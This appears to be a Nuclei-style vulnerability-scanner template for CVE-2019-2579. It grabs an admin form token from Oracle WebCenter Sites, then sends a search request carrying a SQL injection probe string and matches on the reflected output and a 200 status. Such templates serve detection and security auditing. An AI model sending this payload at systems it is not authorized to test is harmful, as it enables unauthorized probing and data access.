# Nuclei-style template: a two-request check for CVE-2019-2579
# (authenticated SQL injection in the Oracle WebCenter Sites admin
# "WebReferences" search). Request 1 fetches the admin page and an
# internal extractor pulls the _authkey_ form token from it; request 2
# replays the search form with that token.
id: CVE-2019-2579

info:
  name: Oracle WebCenter Sites - SQL Injection
  author: leovalcante
  severity: medium
  description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
  reference:
    - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
    - https://github.com/Leovalcante/wcs_scanner
  tags: cve,cve2019,oracle,wcs,sqli
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    # Left unquoted on purpose: the score field is numeric for the
    # consumer, so YAML reading this as the float 4.3 is the intent.
    cvss-score: 4.30
    cve-id: CVE-2019-2579

requests:
  - raw:
      # Step 1: load the admin WebReferences page. Its body carries the
      # _authkey_ token that the "authkey" extractor below captures.
      - |
        GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
        Host: {{Hostname}}

      # Step 2: submit the same page's search form. {{authkey}} is filled
      # from the internal extractor; searchText carries the probe string
      # that the word matcher expects to see reflected in the response.
      # The blank line after Content-Type is the required header/body
      # separator and must stay.
      - |
        POST /cs/ContentServer HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+

    # Carry cookies from request 1 into request 2 — presumably the
    # session cookie set alongside the form token is required for the
    # POST to be accepted; TODO confirm.
    cookie-reuse: true
    extractors:
      - type: regex
        name: authkey
        part: body
        # internal: the value only feeds {{authkey}} in the next
        # request and is not reported as a finding of its own.
        internal: true
        group: 1
        regex:
          - "NAME='_authkey_' VALUE='([0-9A-Z]+)'>"

    # Both matchers must hold: the word matcher AND a 200 status.
    matchers-condition: and
    matchers:
      # NOTE(review): the first word only confirms the probe string is
      # echoed back into the form field, and the second only that the
      # admin utility page rendered; neither observes a difference in
      # query behaviour. Treat a hit as an indicator to verify (and as a
      # signal that the admin page is reachable with the supplied
      # session), not as proof of an exploitable injection.
      - type: word
        words:
          - "value='' and '1'='0 --"
          - "Use this utility to view and manage URLs"
        condition: and

      - type: status
        status:
          - 200